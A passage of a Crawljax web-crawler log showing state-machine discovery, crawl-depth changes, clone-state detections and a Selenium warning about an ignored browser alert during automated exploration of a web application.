Crawl depth is now 3 1589900 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state232 added to the StateMachine. 1589900 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1589909 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1592475 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1593628 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1594766 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1596013 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state233 added to the StateMachine. 1596013 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1596022 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1598320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1599531 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1600723 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1601989 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state234 added to the StateMachine. 1601989 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1602005 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 35 states with unfired actions 1604260 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1605434 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1606634 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1607990 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state235 added to the StateMachine. 1607990 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1608006 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1610275 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1611438 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1612616 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1613886 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state236 and state99 are the same. 1613889 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1616128 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1617300 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1618556 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state237 added to the StateMachine. 1618556 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1618576 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1620843 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1622142 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1623363 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1624608 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state238 added to the StateMachine. 1624609 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1624623 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1626852 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1628017 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1629228 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1630518 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state239 and state130 are the same. 1630521 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 34 states with unfired actions 1632739 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1633909 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1635103 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1636365 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state240 added to the StateMachine. 1636365 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1636374 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1638589 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1639758 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1640962 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1642206 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state241 and state14 are the same. 1642209 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1644449 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1645641 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1647348 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state242 added to the StateMachine. 1647348 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1647452 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1649726 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1650887 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1652225 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1653997 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state243 added to the StateMachine. 1653997 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1654010 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1656262 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1657440 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1658761 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1660315 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state244 added to the StateMachine. 1660315 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1660324 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1662568 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1663828 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1665122 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1666683 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state245 and state14 are the same. 1666699 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1668932 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1670088 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1671394 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1672935 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state246 and state99 are the same. 1672946 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1675177 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1676316 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1677615 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1679216 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state247 added to the StateMachine. 1679216 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1679232 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1681528 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1682685 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1683994 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1685566 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state248 and state14 are the same. 1685570 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1687810 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1688957 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1690636 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1692168 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state249 and state14 are the same. 1692172 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1694392 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1695531 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1696754 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state250 added to the StateMachine. 1696754 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1696760 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1697965 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state251 added to the StateMachine. 1697966 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1697975 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1700199 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1701335 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1702472 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1703690 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state252 added to the StateMachine. 1703690 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1703708 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1705909 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1707048 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1708194 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1709419 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state253 added to the StateMachine. 1709419 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1709429 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1711691 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1712834 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1713973 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1715178 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state254 added to the StateMachine. 1715178 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1715187 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1717420 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1718561 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1719704 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1720937 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state255 added to the StateMachine. 1720938 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1720952 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1723374 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1724515 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1725660 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1726859 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state256 added to the StateMachine. 1726859 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1726868 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1729144 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1730331 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1731265 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 1731266 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 1731273 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 1731475 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1731906 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 1731908 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 1733038 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state257 added to the StateMachine. 1733038 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1733046 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1735294 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1736454 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1737599 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1738801 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state258 and state221 are the same. 1738804 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1741042 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1742200 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1743891 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1745091 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state259 added to the StateMachine. 1745091 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1745099 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1747320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1748470 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1749620 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1750796 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state260 added to the StateMachine. 1750797 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1750812 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1753180 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1754348 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1755506 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1756692 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state261 added to the StateMachine. 1756692 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1756701 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1758952 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1760130 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1761314 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1762506 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state262 added to the StateMachine. 1762506 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1762515 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1764733 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1765903 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1767058 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1768268 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state263 added to the StateMachine. 1768268 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1768273 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 33 states with unfired actions 1769365 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Welcome Mr. textvalue): Welcome Mr. textvalue Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 1769384 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1771817 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1772984 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1774122 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1775286 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state265 added to the StateMachine. 1775286 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1775294 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1777496 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1778678 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1779863 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1781113 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state266 added to the StateMachine. 1781114 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1781122 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1783351 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1784526 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1785687 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1786907 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state267 and state116 are the same. 1786910 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1789171 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1790381 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1791555 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1792759 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state268 and state190 are the same. 1792762 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1794974 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1796114 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1797277 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1798484 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state269 added to the StateMachine. 1798484 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1798494 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 32 states with unfired actions 1800715 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1801870 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1803055 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1804241 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state270 added to the StateMachine. 1804241 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1804249 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1806447 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1807593 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1808837 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1810090 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state271 added to the StateMachine. 1810091 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1810100 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1812316 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1813459 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1814775 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1816123 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state272 and state91 are the same. 1816131 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1818372 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1819522 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1820750 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state273 added to the StateMachine. 1820750 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1820777 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1823027 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1824171 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1825345 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1826577 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state274 added to the StateMachine. 1826577 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1826594 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 31 states with unfired actions 1828841 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1830031 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1831200 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1832480 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state275 added to the StateMachine. 1832480 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1832496 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 1834888 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1836096 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1837261 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1838505 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state276 and state14 are the same. 1838508 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1840761 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1841937 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1843419 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state277 added to the StateMachine. 1843419 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 1843522 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1845862 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1847040 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1848414 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1849948 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state278 added to the StateMachine. 1849948 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1849966 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1852433 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1853610 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1854932 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1856457 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state279 and state130 are the same. 1856461 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1858726 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1859901 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1861212 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1862780 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state280 added to the StateMachine. 1862780 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1862797 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1865053 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1866213 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1867619 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1869099 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state281 and state99 are the same. 1869103 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1871355 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1872524 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1873807 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1875297 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state282 and state14 are the same. 1875300 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1877549 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1878713 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1880004 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1881523 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state283 and state43 are the same. 1881527 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1883866 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1885041 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1886682 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1888251 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state284 and state26 are the same. 1888255 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1890542 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1891687 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1892829 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1894024 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state285 added to the StateMachine. 1894024 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1894032 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1896324 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1897485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1898649 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1899866 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state286 added to the StateMachine. 1899866 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1899874 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1902116 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1903259 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1904405 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1905601 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state287 added to the StateMachine. 1905601 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1905609 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - 